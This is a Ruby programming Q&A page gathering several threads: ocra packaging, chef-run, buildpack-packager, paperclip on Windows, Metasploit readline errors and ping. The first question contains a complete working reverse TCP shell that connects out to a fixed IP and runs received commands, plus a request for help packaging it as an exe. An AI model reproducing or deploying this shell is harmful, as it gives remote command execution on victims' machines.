Ruby compile with ocra error - libssp-0.dll not found - ruby

I'm trying to compile a simple reverse TCP shell written in ruby with ocra.
The code is pretty simple:
#!/usr/bin/env ruby
require 'socket'
require 'open3'
#Remote Host IP
RHOST = "192.168.197.23"
#Remote Host Port
PORT = "6969"
#Tries to connect every 5 seconds
begin
sock = TCPSocket.new "#{RHOST}","#{PORT}"
sock.puts "You are connected to your victim"
rescue
puts "Retrying..."
sleep 5
retry
end
#Runs the commands you type and sends you back the stdout and stderr.
begin
while line = sock.gets && line
Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
IO.copy_stream(stdout_and_stderr, sock)
end
end
rescue
retry
end
I build it with: ocra RevShell.rb --verbose
I get no error messages but whenever I try to run the .exe I get the following error: "C:\Users\Andrea\AppData\Local\Temp\ocrE30.tmp\bin\ruby_builtin_dlls\libssp-0.dll not found"
Am I missing something? Ocra should check the needed requirements by itself adding it to the exe by I still miss this dll.
Thanks for your help.

Maybe you don't have the libssp-0.dll file installed. You can download it from https://www.dll-files.com/libssp-0.dll.html then placing the file where the error says.

Use --dll ruby_builtin_dlls\libssp-0.dll.
See https://github.com/larsch/ocra/issues/168 for more details.

I faced the same problem with Ruby 2.6 and 2.7 (x64) installed by RubyInstaller.
In my case, libssp-0.dll surely exists at the ruby_builtin_dlls directory, but somehow it was not included in the compiled exe while other dlls in the same directory are all included.
For time being, I could evade this problem by using (x86) version of Ruby 2.7.

Related

Install a particular Ruby version using chef-run

I have been trying to install a particular (latest) version of Ruby using Chef Workstation and its included chef-run CLI.
This is the recipe I'm using for Ruby:
package 'ruby' do
version '2.5.3'
action :install
end
Which, running with the command line
chef-run -i /path-to/private_key user#host ruby.rb
Produces the not very helpful message:
[✔] Packaging cookbook... done!
[✔] Generating local policyfile... exporting... done!
[✖] Applying ruby from ruby.rb to target.
└── [✖] [127.0.0.1] Failed to converge ruby.
The converge of the remote host failed for the
following reason:
Expected process to exit with [0], but received '100'
I have tried to run it with the -V flag, or look for a log file, but I can't seem to find it. Any idea?
raise the log_level by setting it to debug in the chef-workstation configuration
$ cat ~/.chef-workstation/config.toml
[log]
level="debug"

Ruby: 'Zip is not installed' error message when running on Win CMD this: buildpack-packager --uncached

I'm running cmd command buildpack-packer --uncached (or any other option of buildpack-packer). I had many error messages prior that. They were caused by bad content of manifest.yml. I corrected them. So now I receive this error message: Zip is not installed (RuntimeError)
I used gem install to install zip gem and rubyzip gem (as first did not work, so I tried a second). So now both not helping to get rid of this error message.
Here is a part of the installed gem list:
And here is the code that drops this error (found it based on the error message in file: C:/Ruby24-x64/lib/ruby/gems/2.4.0/gems/buildpack-packager-2.3.4/lib/buildpack/packager.rb):
I'm quite new in Ruby, so maybe I do some very basic mistake...
Thx in advance!!
Please don't use pictures or screenshots in your post. Use plaintext only.
I think you are misunderstanding the code:
_, _, status = Open3.capture3('which zip')
It checks if you have any zip program (executable) installed not a ruby gem (library). It actually executes which zip in your cmd shell.
For example on my system it found an oracle one:
c:\> which zip
/c/app/oracle/client11g/product/11.2.0/client/bin/zip
Then if you test it in irb:
irb(main):004:0> _, _, status = Open3.capture3('which zip')
=> ["/c/app/oracle/client11g/product/11.2.0/client/bin/zip\n", "", #<Process::Status: pid 10944 exit 0>]
You can see that the executable was found and success state is indicated by the 0. The variable status holds the return message - status => #<Process::Status: pid 10944 exit 0>
I have the which program from dev_kit:
c:\>which which
/c/prg_sdk/ruby/dev_kit/bin/which

On Windows paperclip uses "file" command in Ruby Devkit, but gives error "Errno::EEXIST in ArticlesController#create"

On Ubuntu paperclip file upload works with builtin file command. On Windows I did both install Ruby Devkit or file.exe in PATH variable: None of this helps! I get:
File exists # sys_fail2 - C:/Users/Lap127/AppData/Local/Temp/3e26e8e7aa5f147d0c6c7ae71efc007220170215-7312-1bv14wq.txt
Extracted source (around line #24):
def create
#article = Article.new(article_params) #line 24 here
if #article.save
redirect_to #article
How do I upload attachments with paperclip on windows without getting error, that the new file already exists?
Ran into a similar issue with this before, and it took a bit of searching, but here's where the problem was for tempfiles and Ruby on Windows.
C:\<path_to_ruby_file>\lib\ruby\<version>\tempfile.rb
Based on this post: https://www.ruby-forum.com/topic/187311
Our team was able to find the problem.
While they have a solution, we ended up writing our own.
You want (~Line 204):
def unlink
#----ADDED THIS LINE---#
return if #unlinked
#-----END ADDED LINE----#
begin
File.unlink(#tmpfile.path)
rescue Errno::ENOENT
rescue Errno::EACCES
# may not be able to unlink on Windows; just ignore
return
end
ObjectSpace.undefine_finalizer(self)
#unlinked = true
end
alias delete unlink
If you are still getting this error, let me know! Additionally, if you could check that the content of the tempfile is what you expect, that might be useful.

msfcli RBreadline and Readline problems

Hello my friends i have a problem with Metasploit.
OS: Fedora 20
Metasploit: Cloned from git.
The problem is:
when i run
msfconsole
I have this error:
"/usr/local/share/gems/gems/activesupport-3.2.19/lib/active_support/dependencies.rb:240: stack level too deep (SystemStackError)"
but when i run:
msfconsole -L
Everithing goes fine.
So the issue is that i have to run
msfcli auxyliary/scanner/smb/smb_enunshares E
and i get the same error when i run "msfconsole"
I believe that the problem is for somes GEMS.
EDIT:
I was able to solve the problem, but this isn't the best way.
I had to modify the code.
This is what i do:
1) edit the file: /metasploit-framework/lib/msf/ui/console/driver.rb
2) go to line: 59
3) replace:
rl = false
rl_err = nil
begin
if(opts['RealReadline'])
require 'readline'
rl = true
end
rescue ::LoadError
rl_err = $!
end
# Default to the RbReadline wrapper
require 'readline_compatible' if(not rl)
for:
rl = true
rl_err = nil
require 'readline'
and then everithing should work. What i did is to force the "-L" option in the code.
if anyone have another solution, please post it!
:-)
The problem is an incompatibility with Metasploit's bundled rbreadline and ruby 2.x; use 1.9.3 for now or start msfconsole with -L.

ruby ping for 1.9.1

I want to ping a site in my ruby code and saw that net-ping was a nice library to do this with. Unfortunately, when I tried to gem install net-ping I got the following error:
C:>gem install net-ping
ERROR: Error installing net-ping:
win32-open3 requires Ruby version < 1.9.0.
upon further research, I found that net-ping was not available yet for 1.9.X. Does anyone have a good piece of code that pings that they would be willing to share.
If by 'site' you mean website, then I wouldn't use ping. Ping will tell you if the host is up (unless a router or firewall is blocking ICMP), but it won't tell you if your web server or web app is responding properly.
If that's the case, I'd recommend Net::HTTP from the standard library, or any of the other HTTP libraries. One way to do it is:
def up?(site)
Net::HTTP.new(site).head('/').kind_of? Net::HTTPOK
end
up? 'www.google.com' #=> true
You can always do this and use regexps to parse the result or just check the exit status:
ping_count = 10
server = "www.google.com"
result = `ping -q -c #{ping_count} #{server}`
if ($?.exitstatus == 0) do
puts "Device is up!"
end
Ping return values that you can check against:
The ping utility returns an exit status of zero if at least one response was heard from the specified host; a status of two if the transmission was successful but no responses were received; or another value (from <sysexits.h>) if an error occurred.
http://www.manpagez.com/man/8/ping
For windows follow these instructions:
download djberg96-net-ping-net-ping-1.5.3-0-g9252076.zip from github.com/djberg96/net-ping
unzip, cd in the folder
gem build net-ping.gemspec
gem install net-ping-1.5.3-universal-mingw32.gem
gem install win32-security
to use it:
require 'net/ping'
p Net::Ping::TCP.new('www.google.com', 'http').ping?
p Net::Ping::TCP.new('foo.bar.baz').ping?
Use from source
gem "net-ping", :git => 'git://github.com/djberg96/net-ping.git'
# bundle install
Now you can use functions from it in 1.9.2

Resources